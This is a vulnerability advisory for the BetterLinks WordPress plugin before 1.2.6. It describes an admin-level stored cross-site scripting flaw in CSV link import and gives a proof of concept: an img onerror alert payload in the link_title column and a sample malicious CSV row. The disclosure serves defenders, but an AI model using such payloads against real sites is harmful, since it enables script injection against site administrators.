WordPress Plugin Vulnerabilities
BetterLinks < 1.2.6 - Admin+ Stored Cross-Site Scripting
Description
The plugin does not sanitise and escape some of imported link fields, which could lead to Stored Cross-Site Scripting issues when an admin import a malicious CSV.
Proof of Concept
Go to Plugin's Settings page, in "Tool" tab, import a CSV file with Betterlinks option. Put a simple XSS payload into "link_title" column in the csv file: title"><img src onerror=alert('xss')> The XSS will be triggered when accessing Manage Links page. Example of malicious CSV: ID,link_author,link_date,link_date_gmt,link_title,link_slug,link_note,link_status,nofollow,sponsored,track_me,param_forwarding,param_struct,redirect_type,target_url,short_url,link_order,link_modified,link_modified_gmt,wildcards,expire,dynamic_redirect,tags,category 1,1,"2021-10-01 12:48:35","2021-10-01 12:48:35",\"><img/src/onerror=alert(/XSSS/)>,slug,note,publish,1,,1,,,307,https://example.com/aaa,go/xss,0,"2021-10-01 12:48:35","2021-10-01 12:48:35",0,,,,uncategorized
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Huy Nguyen
Submitter
Huy Nguyen
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-20 (about 2 years ago)
Added
2021-10-20 (about 2 years ago)
Last Updated
2022-04-14 (about 2 years ago)